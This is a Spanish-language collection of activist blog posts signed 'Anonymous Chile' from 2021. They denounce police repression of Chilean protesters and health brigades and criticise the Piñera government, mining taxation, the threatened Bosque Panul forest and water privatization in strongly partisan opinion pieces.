Sin unidad no habrá fuerza ni solidez en nuestros afanes de liberación. Sin embargo, hay una tarea que a nuestro juicio debería estar a la base de nuestro accionar, esta tarea es la Denuncia Política, un quehacer que debe hoy multiplicarse mil veces en los frentes sociales, para desenmascarar al enemigo, dejar en evidencia ante las masas sus triquiñuelas, sus manipulaciones, sus abusos, su opresión, su explotación, sus crímenes. Convertirnos en un verdadero ejército de denuncia de los males del capitalismo y que hoy aplastan la vida de los pobres. Multipliquemos los pies, los brazos y las manos de ese activo social y político y rescatemos a nuestro país, cautivo de la Propiedad Privada de los Monopolios.

¡BASTA DE ABUSOS, BASTA DE ROBOS, BASTA DE LADRONES DE CUELLO Y CORBATA!

El mundo observa mientras el estado fascista reprime y asesina

Publicada el 14/08/2021 por Anonymous Chile

«La cobardía a enfrentar el totalitarismo del nazismo y el fascismo, hoy el silencio cómplice de muchos de los candidatos con y sin partidos, militantes e independientes se hace presente».

Primero vinieron a buscar a los comunistas y no dije nada porque yo no era comunista.
Luego vinieron por los judíos y no dije nada porque yo no era judío.
Luego vinieron por los sindicalistas y no dije nada porque yo no era sindicalista.
Luego vinieron por los católicos y no dije nada porque yo era protestante.
Luego vinieron por mí pero, para entonces, ya no quedaba nadie que dijera nada»

Primero vinieron, Martin Niemöller (1892-1984)

Como reza el poema de Niemöller, “Primero vinieron”, que trata sobre la cobardía a enfrentar el totalitarismo del nazismo y el fascismo, hoy el silencio cómplice de muchos de los candidatos con y sin partidos, militantes e independientes se hace presente.

Primero nos mataron en el estallido culpándonos de todo tipo de delitos, cuando solo salimos cargando la rabia de años, décadas de explotación y miseria. Luego, nos quitaron los ojos en la protesta popular, para que no podamos seguir viendo, a las y los que nos reuníamos y conseguíamos abrazarnos, para caminar juntos. Luego nos secuestraron de las calles y de nuestras familias, en las Cárceles del Estado, acusados de falsos delitos, todos o casi todos, creados en la mala escuela de guionistas del ministerio del interior. Guiones viejos, usados, guiones de montajes y mentiras, protagonizados por agentes del estado entrenados en la mentira y la tortura. Producido y dirigidos por “infelices”.

El silencio cómplice continúa de la mano, de la sistemática mentira, de un proceso que los diversos candidatos los de los partidos e independientes, han guardado silencio mientras, a lo largo de todo Chile, se persigue y encarcela a los luchadores sociales, a los luchadores por la liberación de una nación, se persigue y se encarcela a jóvenes y niños por las policías del Estado de Chile, se encarcela y secuestra a mujeres y hombres, lejos de sus familias, con órdenes de los Tribunales de la Injusticia. Mientras el Silencio Cómplice come y bebe de la misma mesa esperando el 11 de abril.

Hoy el Gobierno y el Estado diriges sus jaurías de guerra, dirige sus tentáculos de manipulación y provocadores, contra en este largo proceso se han dispuesto y donado, a proteger y cuidar a los luchadores sociales. A quienes se han enfrentado a las fuerzas policiales militarizadas para poder capturar las imágenes de denuncia de la obscena represión y así colaborar en la derecho a la información, libre expresión, denuncia permanente del abuso del PODER y de entregar a las defensas de los perseguidos las imágenes que colaboren en los procesos judiciales con los que son perseguidos, los medios populares de información.

Luego el ataque lo han redirigido a la agresión directa contra las brigadas de salud y rescate, que cuidan a quienes resisten en todos los territorios, hemos visto como han sido golpeados, gaseados y abusados cada jornada, por los agentes del estados.

Y por último, a los observadores de derechos humanos, las denuncias de los denunciantes son múltiples, permanentemente expuestos a la violencia del estado. ¿Dónde están los candidatos denunciando? ¿Dónde están los candidatos que quieren representar al pueblo? En un proceso del 11 de noviembre del 2019, Pacto de la Case Política con el Poder Económico en las tinieblas del Congreso, sin participación popular.

Brigadas de salud denuncian el genocidio fascista ejercido por el gobierno contra el pueblo de Chile

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

Compartimos el comunicado de las brigadas de salud, que vienen denunciando la violenta represión de la policía y el gobierno, desde el estallido social del 18 de Octubre de 2019. Al pueblo de Chile, a sus organizaciones y a la comunidad internacional, a detener el genocidio fascista contra el pueblo chileno.

Denunciamos el ensañamiento de las fuerzas policiales militarizadas del Estado de Chile contra las y los brigadistas voluntarios de salud, las cuales se han intensificado durante las últimas semanas, como lo demuestran innumerables grabaciones, tanto de los medios populares de información, como de manifestantes.

El día viernes 12 de marzo, miles de personas pudieron presenciar con estupor, producto de los registros difundidos en redes sociales, como un amplio contingente policial acorraló, atacó con agentes químicos y golpeó a brigadistas de salud en las cercanías de la Plaza de la Dignidad.

En la jornada siguiente, viernes 19 de marzo, mientras voluntarios y voluntarias de la Brigada Rescate-B se encontraban atendiendo a dos manifestantes afectados por el ataque con gas pimienta, fueron atacados con a lo menos cuatro bombas lacrimógenas, arrojadas directamente al punto de atención, lo cual los obligó a retirarse del lugar. Cuando se alejaban de los gases, una de las voluntarias sufre un desmayo producto de la inhalación de los agentes químicos arrojados por la policía.

Acto seguido, el piquete policial comienza a atacarlos y a empujarlos con sus escudos, ante lo cual, la brigadista voluntaria María Cecilia Stuardo se voltea para defenderse de la agresión y mantener la protección a la brigadista afectada. Es cuando entonces, un funcionario policial se abalanza sobre ella, gritándole fuertes garabatos, denigrándola y amenazándola con gran violencia. Posteriormente, cuatro agentes la arrastran hasta el furgón policial, en donde la lanzan contra el suelo del carro, pisando su pecho con la bota de uno de los policías, mientras otros la golpean, amenazan e insultan.

Como si esto no fuera suficiente, antes de dirigirse al sitio donde sería custodiada, los funcionarios trasladan a los detenidos al Centro de Salud Familiar Nº1 Ramón Corvalán Melgarejo, en donde una policía impide la revisión clínica de Cecilia, por lo que el funcionario de salud solo puede realizar una observación superficial de su estado de salud físico y emocional, quedando este acto reducido al trámite administrativo que se indica para las detenciones policiales, ya que de ningún modo permite determinar que daños había sufrido. Posteriormente, es trasladada hacia la Tercera Comisaría de Santiago, lugar donde la aislaron del resto de los detenidos y continuaron las amenazas, insultos y hostigamiento, solo por el hecho de pertenecer a una brigada de salud, situación que se prolongó hasta las 04:30 horas, cuando fue liberada sin cargos.

Es importante destacar, que estos actos se suman a las innumerables situaciones de agresión a Brigadas de voluntarias y voluntarios que no participan de las manifestaciones, y cuya labor ha sido fundamental para socorrer a personas lesionadas por el excesivo actuar policial, significando incluso salvar vidas en más de una ocasión. Sin embargo, la respuesta del Estado chileno ha sido la brutalidad y la represión, resultando casi siempre en quemaduras producto de los químicos arrojados desde los carros lanza-aguas y la asfixia por los ataques con gas pimienta, además de los golpes con lumas y patadas en reiteradas oportunidades.

Esta situación no tiene precedentes en el mundo, ya que existen protocolos internacionales que prohíben a los Estados y a las fuerzas beligerantes, atacar a personal sanitario que cumple la labor de cuidar a personas heridas y salvar vidas. Los hechos gravísimos ya descritos, son un elemento más de las miles de situaciones inaceptables que se viven a diario en nuestro país, que se suman al deterioro moral y político en que ha caído el Estado de Chile. Frente a esto, la clase política y la comunidad internacional, no pueden seguir guardando cómplice silencio.

Es por todo lo anterior, que hacemos un enérgico llamado al conjunto de los actores sociales y políticos, a los Estados que mantienen relaciones con nuestro país y a los pueblos del mundo, a través de sus organizaciones, para que, así como se levantaron para condenar las atrocidades cometidas por la dictadura Pinochet, hagan lo mismo con las atrocidades efectuadas por este gobierno.

Por lo tanto, no existe argumento ni cálculo político que exonere de responsabilidad a quienes se hacen cómplices, por acción u omisión, de las atrocidades cometidas por el Estado chileno. Frente al silencio y la indolencia, el juicio de la historia no tendrá dos interpretaciones.

Brigada Rescate-B
Brigada Resistencia
RRVV (Rescatistas Voluntarios)
Brigada Wallmapu
Brigada Cristina Fuentes
Brigada Alhue
Brigada Cruz bellavista
MSR (Movimiento Salud en Resistencia)
Punto Morado
PLAR
La Ambulancia Popular

https://videos.files.wordpress.com/KnPWGMQz/la-violencia-impune-de-carabineros-de-chile_mp4_dvd.mp4

Violenta «carga» de la policía militarizada chilena sobre manifestantes, rescatistas y puesto médico, una represión con total impunidad.

Modelo de una dictadura

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

Piñera se sustenta en el apoyo de las FF.AA. y Carabineros, y en la práctica, no existe oposición política. Buena parte del Congreso y los supuestos partidos de oposición (PS-PR-PPD-DC) aprueban sin chistar y a ojos cerrados todos los proyectos del Gobierno.

Mario Vargas Llosa fue quien definió los 70 años de hegemonía del PRI en México como el modelo de una dictadura. Para todos los efectos, México era un gobierno democrático: había elecciones cada cierto tiempo y la gente participaba de ellos. Lo que no se decía es que no había oposición política y que había un férreo control militar y policial sobre la población civil, prueba de ello es la Masacre de Tlatelolco en 1968, donde aún no se sabe la cifra exacta de jóvenes asesinados por ese “gobierno democrático”. Algo parecido podríamos decir del actual gobierno chileno: Piñera se sustenta en el apoyo que le dan las fuerzas armadas y carabineros, y, en la práctica, no existe una oposición política. Buena parte del Congreso y los supuestos partidos de oposición (PS-PR-PPD-DC) aprueban sin chistar y a ojos cerrados todos los proyectos que les envía el Ejecutivo. Es lo que ocurrió con la votación para extender el Estado de Excepción y el toque de queda hasta el 30 de junio, y, sin embargo, la ciudadanía está convocada a participar en las elecciones del 11 de abril. Es decir, vivimos en un remedo de democracia, en una burda parodia.

La Madrugada del 15 de noviembre de 2019, el Gobierno del Presidente Sebastián Piñera y la «oposición» de la ex-concertación más el Frente Amplio, pactaron un «acuerdo de paz». Ese mismo día, el gobierno siguió con la violenta represión de la policía, las mutilaciones, los heridos, detenidos y torturados. Dejando en claro que ese acuerdo de paz, solo era para salvar al mismo Sebastián Piñera y nada ni nadie más que sólo a él.

Las razones para extender el toque de queda serían sanitarias, pues como dijo el “vocero” Enrique Paris, es para “prevenir un rebrote del covid”, sin embargo, ese rebrote ya existe y se debió justamente al permiso que otorgó esa misma autoridad “para salir a veranear”. Y para que los “honorables diputados” sacaran pronto la votación, el ministro secretario de la Presidencia, Juan Carlos Ossa SantaCruz, amenazó con cortar las exiguas ayudas sociales dadas por el gobierno, como el IFE, el Bono Covid, Crianza Protegida, etc, pues todas esas medidas estarían sujetas al Famoso Estado de Excepción. De ese modo, de los 150 diputados, solo 42 se opusieron a ese vil chantaje.

Y mientras el retiro de la estatua de Baquedano se convierte en un “tema-país”, las fuerzas represivas ingresan a sectores populares (Villa Francia, La Legua, etc), para amedrentar a la población, y continuar con la “Guerra imaginaria” que solo existe en la cabeza del desquiciado de Sebastián Piñera. Vemos cómo los dirigentes de la ex concertación se ponen creativos para barajar opciones que reemplacen a Manuel Baquedano en la Plaza Dignidad, pero guardan un cómodo silencio a la hora de pronunciarse sobre la violencia estatal. Ni Paula Narváez ni Heraldo Muñoz, los paladines de la “izquierda democrática” han dicho nada para intentar detener las ansias de venganza de los milicos y de “Su Excelencia”, lo que se puede interpretar como que quizás ellos actuarían de una forma similar de estar en el lugar de Sebastián Piñera.

Como señalábamos al comienzo, para que una dictadura sea perfecta no solo requiere de un gobierno represor, también de una falta de oposición, y es lo que vemos actualmente en el país. Una patética genuflexión de la ex concertación a favor de todos los dictámenes que se le ocurren a Piñera. Así, sucede la paradoja que el presidente con el mayor rechazo de la historia cuenta con un fuerte respaldo no solo de los militares, sino que del Partido del Orden, de los seudo-progresistas.

Carter e inmobiliarias intentan acabar con el Bosque Panul

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

El responsable político de la destrucción será el actual alcalde de La Florida y candidato Rodolfo Carter, quien mintió en 2015 al asegurar que su nuevo Plan Regulador, aprobado con el apoyo de Marco Espinoza (DC) y Nicanor Herrera (PS), salvaba el Panul.

La Inmobiliaria Gesterra presentó, en Enero del presente año en curso 2021, un proyecto de subdivisión del Bosque Panul. La propuesta de la empresa inmobiliaria busca subdividir el emblemático bosque nativo, para construir calles y otras obras que destruirán el ecosistema, intentando así presionar para que se apruebe su megaproyecto inmobiliario.

El responsable político de ocurrir esta masacre será el actual alcalde de La Florida y candidato Rodolfo Carter, quien mintió el año 2015 al asegurar que su nuevo Plan Regulador ( aprobado con el apoyo de los ex concejales Marco Espinoza (DC) y Nicanor Herrera (PS)) había salvado el Panul.

La Inmobiliaria Gesterra presentó, en enero de este año, un proyecto de subdivisión del Bosque Panul. Esto le permitirá comenzar con obras de urbanización, como calles, alumbrado público y alcantarillado en pleno bosque nativo, gracias al actual plan regulador que rige en la comuna, situación que fue denunciada en su momento.

En efecto, el alcalde Rodolfo Carter logró aprobar el año 2015 su Plan Regulador (con el apoyo de los ex concejales Marco Espinoza (DC) y Nicanor Herrera (PS)) que si bien restringió el uso residencial en una parte del bosque, permitió distintas obras de urbanización y destrucción del ecosistema, ya que no generaba un parque público en el lugar.

Esto fue duramente criticado en su momento por la organización comunitaria Red Precordillera, a la que el alcalde tildó de mentirosa, y de querer generar un falso enemigo político para existir.

Finalmente, la verdad quedó al descubierto, ya que los propios trabajadores de la empresa corroboraron que se presentó un proyecto para urbanizar el bosque, confirmando las sospechas de la comunidad, que comenzaron cuando aparecieron calicatas (estudios del suelo), marcas proyectando calles, y maquinarias (retroexcavadoras) que «mejoraron» y abrieron caminos al interior del bosque.

Finalmente, la verdad quedó al descubierto, ya que los propios trabajadores de la empresa corroboraron que se presentó un proyecto para urbanizar el bosque, confirmando las sospechas de la comunidad, que comenzaron cuando aparecieron calicatas (estudios del suelo), marcas proyectando calles, y maquinarias (retroexcavadoras) que «mejoraron» y abrieron caminos al interior del bosque.

La comunidad ha solicitado por distintos canales esta información al municipio vía transparencia, pero éste ha dilatado impresentablemente el tema para después de las elecciones del próximo mes.

Ahora la única solución para salvar el Bosque Panul es que el municipio y Rodolfo Carter rechacen el proyecto presentado, y cambien a la brevedad el Plan Regulador, generando un área verde pública en todo el bosque.

La comunidad se prepara para una férrea defensa, y no permitirá que talen el Panul.

El miedo de las corporaciones mineras y sus esclavos

Publicada el 13/08/2021 - 11/10/2021 por Anonymous Chile

Rodrigo Valdés no es el único vendepatria. Basta con conocer la lista de ministros de Hacienda para constatar que ni uno de ellos ha defendido los intereses del país ante la voracidad del capital privado, nacional y extranjero. Una nota de Julián Alcayaga.

Las transnacionales mineras están preocupadas: temen que la Convención Constitucional se ocupe del ridículo tributo minero al erario nacional. Peor aun, que se discuta y se apruebe su renacionalización. Algunos candidatos a la convención ya se pronunciaron claramente a favor, como el Dr. Pablo Salvador Sepúlveda Allende, candidato por el Distrito 10 de Santiago, nieto del gran presidente.

Asustados, lobbystas y asesores de las transnacionales escriben en los medios de comunicación para defender lo indefendible, mintiendo, falseando u omitiendo la realidad. Para eso les pagan, ¡con nuestro dinero!

Es lo que hace el Ex Ministro de Hacienda de Bachelet, Rodrigo Valdés. En una columna de Economía y Negocios de El Mercurio del Domingo 7 de Marzo del presente año en curso 2021, titulada “Impuesto a la Minería: Merecemos más”, sostiene:

La abrupta alza del precio del cobre aceleró una discusión pendiente: ¿Qué parte de la renta minera debería quedar en manos del Estado? En este tema, como en Twitter, la falta de información o derechamente la información errada, lleva fácilmente a propuestas equivocadas. Lamentablemente estamos medio a ciegas. Es poco claro cuánto recibe el Estado ni cuanto queremos que reciba. No tenemos respuestas precisas para las preguntas más simples: ¿cuánto es la tributación minera actual?

Es inaudito, irresponsable y grosero que un ex Ministro de Hacienda sostenga que no sabe cuánto recibe el Estado de la actividad minera, y que no está claro cuánto representa la tributación minera actual. Para saberlo, un Ministro de Hacienda, que tiene bajo su autoridad directa la Dirección de Presupuestos, la Tesorería General de la República y el Servicio de Impuestos Internos (SII), solo tiene que preguntar. Mejor aun: es él mismo quien determina las reglas tributarias, y los montos, en la Ley de Presupuestos que cada año se elabora y aprueba bajo su autoridad directa.

Para conocer la tributación minera bastaba que el Ministro de Hacienda Sr. Rodrigo Valdés contactase a la Tesorería, y sobre todo al SII, solicitando esa información. ¡Sin olvidar que quien fija las reglas es él mismo! Es la tarea de los mencionados organismos conocer esa tributación con absoluta precisión. El problema es que se trata de una tributación miserable, y por eso las transnacionales y sus lobbystas a sueldo intentan siembrar la duda.

¿Por qué mienten los lobbystas de las mineras respecto a su tributación? Porque les pagan para mentir. De este modo esperan alejar hasta la posibilidad de que la Convención Constitucional discuta el tema.

Esconder la tributación minera siempre ha sido un objetivo de las transnacionales y de sus acólitos en el gobierno y en los medios de comunicación. Por eso le encargan a economistas, abogados, ingenieros y políticos, jugosamente pagados, que pretendan que es imposible conocer el miserable aporte que las mineras le hacen a nuestro país.

Pero el monto de la miserable tributación es conocido en el detalle. Comenzando por la Ley de Presupuestos que prepara el propio Ministerio de Hacienda. Para terminar con las dudas respecto de esa tributación, bastaría con que el gobierno, la Cámara de Diputados o el Senado, le ordenen al Director Nacional del SII comunicar los montos efectivamente ingresados por el Fisco en razón de la tributación del conjunto de la minería privada desde 1990 a la fecha. De este modo todo Chile conocerá la triste realidad.

Entretanto, es una vergüenza y una infamia que Rodrigo Valdés, ex Ministro de Hacienda, afirme doctoralmente que no es posible conocer la tributación minera. Vergüenza e infamia que debe haber sido muy bien pagada.

Chile, el país donde no se respeta el derecho a la vida ni las libertades humanas básicas

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

La desconfianza se ha generalizado y la línea que separaba el bien y el mal está completamente desdibujada. Como completamente nublados, además, los referentes morales y liderazgos espirituales. La existencia se nos hace cada vez más frágil e incierta.

Cuando la ausencia de virtud se erige en modelo, el delito es la regla y las mafias se imponen. Chile cayó abruptamente en ese camino, gracias al golpe de Estado del 11 de septiembre de 1973. De ahí en adelante las FF.AA. se confundieron con una banda armada, y cometieron todo tipo de tropelías. La «progresía» creyó poder vivir en medio de ese mambo, cortando su propia tajada. Víctima, una: el pueblo de Chile. Servicios públicos e instituciones devinieron feudos al servicio de intereses extremadamente privados.

No es cuestión de que la prensa magnifique los acontecimientos para obtener audiencia, rating y lectores. La vida cotidiana en Chile se ha hecho francamente peligrosa y los delitos comunes se demuestran cada vez más frecuentes y brutales. Se mata para robar un auto, para despojar a los ancianos de sus modestas pensiones como a los niños de sus bicicletas. Se trata ahora de bandas constituidas por adolescentes e inimputables, cuyas armas las obtienen de los narcotraficantes, de las propias policías y de las redes de contrabando. Los pobres les roban a los propios pobres y también a los ricos. Y hasta han surgido mujeres que se organizan, delinquen e incluso inducen a sus hijos a practicar asaltos y un sinnúmero de acciones criminales.

En tiempos de pandemia a veces no existe más remedio que violar la ley y atentar contra el prójimo frente a un gobierno extremadamente cicatero, que se ufana de estar ganando más dinero que nunca por el alto precio internacional del cobre. Piñera y sus afines ciertamente celebran las “oportunidades de negocios” que han surgido de la crisis sanitaria; para ello es cosa de observar las ganancias de los bancos, las ventas de automóviles lujosos y toda esa suerte de emprendimientos que también nos sirven para jactarnos frente a nuestros vecinos.

En este sentido, ha sido bienvenida la inmigración que está salvando nuestra agricultura y los servicios básicos. Desde hace años, requeríamos de más mano de obra barata, según concluyen muchos. Los servicios domésticos hasta se nutren de peruanas, bolivianas que, además de sus servicios propios, les enseñan a hablar mejor a los niños pudientes y de paso enriquecer nuestras prácticas gastronómicas.

Por todas las calles del país se aprecian distintos colores, idiomas, vestimentas y diversas otras curiosidades. Nos estamos convirtiendo en un país cosmopolita y los trabajadores chilenos ya aprendieron que es un pésimo negocio mostrar su descontento y deseo de ser justamente remunerado. La brecha entre los ingresos de pobres y ricos se ha extendido aún más y amenaza, por supuesto, con hacerse muy explosiva.

La Moneda sabe que la pandemia es su mejor aliado, mientras haya dinero para pagarle bien a los uniformados. Porque mientras se pasen por alto sus consabidos privilegios y asaltos al erario nacional se puede conjurar cualquier amenaza contra el “orden constituido”.

De esta forma, derechos tan fundamentales como el de la educación y la diversidad informativa sucumben ante la posibilidad de que la prensa tenga “material” diario para sus informativos teñidos de sangre. La terrible noticia de un niño desaparecido en el sur desaparecido y luego encontrado muerto, ha servido para incrementar el morbo de los telespectadores y extenderle sus contratos a los más frívolos rostros de la farándula informativa nacional que empezaban a ser exonerados a falta de hechos atroces y publicidad comercial. Porque se sabe que ahora lo que importa es solo lo que sucede en Chile, aunque el mundo sea un hervidero de noticias.

Fútbol virtual, crímenes y bulladas corrupciones de la política es lo que más importa mientras la vida se hace agua especialmente allí, donde viven los más pobres y discriminados, cuya cotidianidad no existe para la mayor parte de los medios de comunicación. Porque solo alcanzan especial notoriedad los delitos que se prodigan en los barrios pudientes y, aunque el crimen se intensifica, se soslayan las estadísticas que nos señalan cuántos chilenos mueren a diario por el cáncer y las otras pestes que se han dejado de atender ante el Coronavirus. Tampoco importan los cesantes que se prodigan aún más durante las cuarentenas que, según muchos, contribuirían mucho más a los contagios del Covid 19 en las zonas más hacinadas del país, donde vive la enorme mayoría de nuestra población. Pueblos y ciudades que la Televisión solo consigna cuando se ve forzada a reportar las cacerías policiales en los barrios pobres y las poblaciones indígenas. Las que recién son reconocidas por la autoridad como “macrozonas”, a las que ahora busca imponerles el estado de sitio y el rigor militar, al igual que en tiempos de dictadura, y cuyos muertos todavía no se terminan de encontrar y contar.

Realmente, parece tarde ganarle ya a la delincuencia, cuando la corrupción, para colmo, está tan entronizada en los tribunales de justicia, las policías y las clases dirigentes, cuando los fiscales y jueces compiten mediáticamente entre ellos y aun no se terminen de contar los desfalcos de todas las ramas de nuestra “defensa nacional». Cuando los grandes empresarios ya hicieron un balance favorable entre sus asaltos a los consumidores como al Fisco y las módicas sumas que pagaron en multas solo en aquellos casos en que el escándalo se hizo indisimulable.

¡Vaya como han retornado rápido a la política los legisladores y jefes de partido sobornados! Preparémonos para que muchos malhechores se reelijan en los municipios, levanten sus candidaturas para el Parlamento y alcancen incluso un cupo en lo que muchos quieren ver como un nuevo coto de caza de la política competitiva y bien remunerada: la “Convención constituyente”.

Todo esto explica que el país no se dé leyes más estrictas para combatir el crimen organizado. Si los atroces episodios de tortura, desapariciones forzadas y juicios sumarios siguen impunes o reciben una sanción nimia y hasta ridícula. Curiosamente, los mismos que exigen el “máximo rigor de la ley” para los delincuentes comunes son los que buscan el indulto para los más tenebrosos agentes del estado, los banqueros, los políticos corruptos y los llamados criminales de cuello y corbata.

Pese a las restricciones a la libertad de movimiento, a los confinamientos y estados de sitio, el pueblo sale cada vez más resuelto a las calles para clamar por justicia y exigir un NO a la Impunidad. Los delincuentes comunes se han hecho igualmente repudiables que los carabineros, los políticos y los tribunales. La desconfianza se ha generalizado y la línea que separaba el bien y el mal está completamente desdibujada. Como completamente nublados, además, los referentes morales y liderazgos espirituales. Ya no hay quien pueda describir con alguna certeza lo que ocurre. Todos parecemos desconfiar de todo: La existencia se nos hace cada vez más frágil e incierta. Donde “la vida ya no vale nada”.

Hacia la desprivatización del agua en Chile

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

Las consecuencias actuales de este sistema de aprovechamiento de agua para el país han sido desastrosas, ya que el 80% de los derechos consultivos están en manos del negocio forestal y agropecuario, mientras que el 9% está en manos del negocio minero.

Chile se encuentra dentro de un proceso constituyente inédito después de 30 años de vuelta a la democracia, que tiene al país inserto en un momento histórico, en donde la próxima redacción de una nueva carta fundamental ha abierto la discusión sobre qué país queremos y cuáles debieran ser los derechos consagrados para todxs sus ciudadanxs en la redacción de aquel documento fundamental. Uno de esos derechos en discusión, el agua, es quizás el que más fuerza ha tomado en los distintos cabildos autoconvocados que se han realizado a lo largo de todo el país. Esto, en el contexto de ser el primer país en el mundo en privatizar sus fuentes y gestión de las aguas, lo que ha traído consigo la imposición de un modelo de lucro para un bien común fundamental para la reproducción de la vida, en donde es posible ser dueño de agua sin tener tierra a perpetuidad.

Es así como desde la imposición en dictadura del código de aguas de 1981, se generó un sistema hídrico que dividió su uso en derechos consuntivos y no consuntivos, en donde los primeros son los cuales pueden reutilizarse superficialmente (riego, minería, industria y uso doméstico), mientras que los segundos refieren al uso existente sin consumirla (hidroeléctricas). Las consecuencias actuales de este sistema de aprovechamiento de agua para el país han sido desastrosas, ya que el 80% de los derechos consuntivos están en manos del negocio forestal y agropecuario, mientras que el 9% está en manos del negocio minero. En el caso de los derechos no consuntivos, el negocio hidroeléctrico está en manos de la empresa Enel.

Por otro lado, quienes controlan la distribución del agua en el país (Agua Andinas y Esval), son empresas con capitales transnacionales, que no hacen más que controlar las tarifas y el consumo humano. En otras palabras, estamos en presencia de un modelo hídrico que concibe al agua como un bien económico, y que responde a una ideología neoliberal que pone en el centro el lucro de las empresas por sobre los derechos de las personas.

De ahí la importancia de este proceso constituyente en Chile, que permita desprivatizar un bien común tan importante y vital como lo es el agua.

Se hace necesario por tanto construir una nueva democracia hídrica, que tome en consideración la legislación internacional en materia de agua y también el aporte de experiencias locales en América Latina y en el mundo. Por lo mismo, si bien Chile se puede ver como un caso de lo que no hay que hacer en materia de aguas, han habido importantes avances jurídicos internacionales en lo que respecta a este bien común.

Es lo ocurrido el 28 de julio del año 2010, fecha en la cual la Asamblea General de Naciones Unidas aprobó que el acceso al agua potable y al saneamiento son derechos fundamentales, con 122 votos a favor, 41 abstenciones y ninguno en contra de parte de los estados. Una aprobación que si bien no tiene un carácter vinculante para los países, diferentes constituciones del mundo, como es la de Bolivia, Ecuador, Nicaragua, México, Uruguay. Honduras, la República Democrática del Congo, Sudáfrica y Uganda, han hecho explícito el derecho humano al agua, lo que nos muestra lo relevante de legislar al respecto y lo oportuna que debiera ser esa discusión para Chile a nivel constitucional.

No obstante, declarar el agua como un derecho humano a nivel constitucional no es suficiente, en la medida que no se avance en una legislación que vaya más allá de lógicas antropocéntricas. Es decir, que pongan en el centro a los seres humanos, por sobre otros seres vivos y ecosistemas. De ahí la importancia de debatir sobre nuevos derechos, que vayan más allá de los límites del derecho moderno. Los casos de Ecuador y Bolivia, en donde ambos países existen a nivel constitucional derechos de la Naturaleza y Madre Tierra respectivamente, nos muestran un camino alternativo y más amplio de lo que históricamente se han entendido los derechos. Lo mismo con respecto a países como Colombia, Nueva Zelanda y la India, los cuales han otorgado derechos a los ríos. Distintos casos que debieran ser tomados en cuenta por los distintos asambleístas que redacten la nueva Constitución de Chile, la cual permita desmercantilizar el agua y ampliar los derechos a los distintos territorios del país.

No obstante, como muestra la experiencia de aquellos países anteriormente mencionados, no es suficiente un buen marco jurídico, si en la práctica se vulneran desde las empresas y los mismos Estados aquellos derechos, para seguir profundizando modelos extractivistas. De ahí la importancia de salir no solo de lógicas privadas del agua sino también de miradas Estado-céntricas, que solo buscan nacionalizar los llamados recursos naturales para seguir explotandolos ilimitadamente para su venta en los grandes mercados internacionales. Por eso, la discusión debiera estar centrada también en cómo generar mecanismos de gestión territorial local, que protejan las cuencas de agua y le den un buen uso desde los ecosistemas.

En definitiva, desprivatizar el agua en Chile va mucho más allá que estatizarla, además implica hacerse cargo no solo de un momento histórico del país, sino también en un momento clave del planeta, en medio de una crisis climática profunda, heredera de una civilización industrial, en donde la vida futura de todas y todos está en juego en estos momentos.

Interés nacional vs ideología. ¿Qué mueve al mundo?

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

La humanidad deberá irse acostumbrando a ello, porque vivimos un tiempo de declive de la hegemonía de una potencia y el ascenso de otra que, paradójicamente no aspira a ella. En cualquier caso, hay que tener siempre presente que, para un país no existen amigos ni enemigos, sólo intereses.

A lo largo de la historia de las relaciones internacionales, el interés nacional ha sido el principal mecanismo sobre el cual se construyen los fundamentos de la política exterior. Aquellos que han logrado darle razón de Estado a esos componentes –elevándose por encima de los vaivenes que suponen los cambios de la contingencia política generada por intereses de partidos o grupos– han podido perseverar en el logro de sus objetivos estratégicos.

Sin embargo, durante un pequeño período de la historia esto no ocurrió así. Fue durante la etapa que inició la revolución de octubre en 1917 en Rusia y que duró hasta la penúltima década del siglo pasado cuando el elemento ideológico se convirtió en el eje sobre el cual giraban las relaciones internacionales en el planeta. Sobre todo, después de la segunda guerra mundial, el mundo se organizó a partir de la dicotomía socialismo-capitalismo. Una vez fenecida la URSS tras su colapso y desaparición, el interés nacional volvió a tener el papel relevante que siempre tuvo hasta que los bolcheviques llegaron al poder. Hablo de interés nacional, por supuesto entendiendo que la nación es la posesión más preciada de las oligarquías, por lo cual en torno a ella se han agrupado los objetivos superlativos a lograr para el control de la sociedad, siendo más fuerte que cualquier beneficio, incluyendo el familiar, religioso, étnico u otro cualquiera. En el fondo, al referirse al interés nacional, se está hablando del interés de la clase que ostenta la nación. Esa etapa es la que estamos atravesando ahora.

En el pasado, se debe recordar que cuando los independentistas hispanoamericanos recurrieron a Gran Bretaña en pos de ayuda para sacudirse del dogal colonialista español, Londres se negó en un primer momento a concederles cualquier tipo de apoyo. Inglaterra y España eran aliados en la lucha contra Napoleón cuya derrota era un objetivo de superior importancia para el imperio británico, incluso arriesgándose a quedar fuera de la repartición de los nuevos mercados que se abrirían en América tras la independencia. Pero, derrotado el Gran Corso, Londres se vio liberado de su compromiso con España y accedió a dar algún apoyo a los irredentos luchadores por la libertad de la América española a pesar de la queja ibérica por tal decisión.

La política británica fue resumida en la “magistral” frase de Lord Palmerstone, primer ministro y ministro de relaciones exteriores de su majestad, quien afirmó: “No tenemos aliados eternos, y no tenemos enemigos perpetuos. Nuestros intereses son eternos y perpetuos, y nuestra obligación es vigilarlos”, lo cual en pocas palabras significa que los amigos y los enemigos son transitorios y dependen de las circunstancias. Dicha frase ha tenido permanente vigencia en la política exterior, e incluso recientemente Gran Bretaña la utilizó para explicar el Brexit.

En tal medida, hay categorías que no pueden ni deben ser entendidas con la lógica del pasado. Por ejemplo, hoy Vietnam busca aliarse con Estados Unidos en contra de China para defender su posición en el diferendo que ambos países asiáticos tienen en el mar de China Meridional. Incluso, han discutido la posibilidad de que Hanói le alquile a Washington las bases militares que tuvo hasta 1975 en el sur del país. Algo incomprensible para un observador rígido que utiliza los cánones de la guerra fría para analizar la situación actual.

Otro ejemplo, el Partido de los Trabajadores del Kurdistán (PKK), organización de origen marxista leninista que lucha por el socialismo, debe primeramente crear un Estado que los kurdos no poseen. Mientras su pueblo se encuentra diseminado entre Siria, Turquía, Irán e Irak, el PKK se ha aliado con Estados Unidos para enfrentar a Turquía, su principal enemigo, lo cual resulta difícil de entender cuando se observa cómo Washington utiliza a los kurdos para lograr sus detestables objetivos en el Asia Occidental.

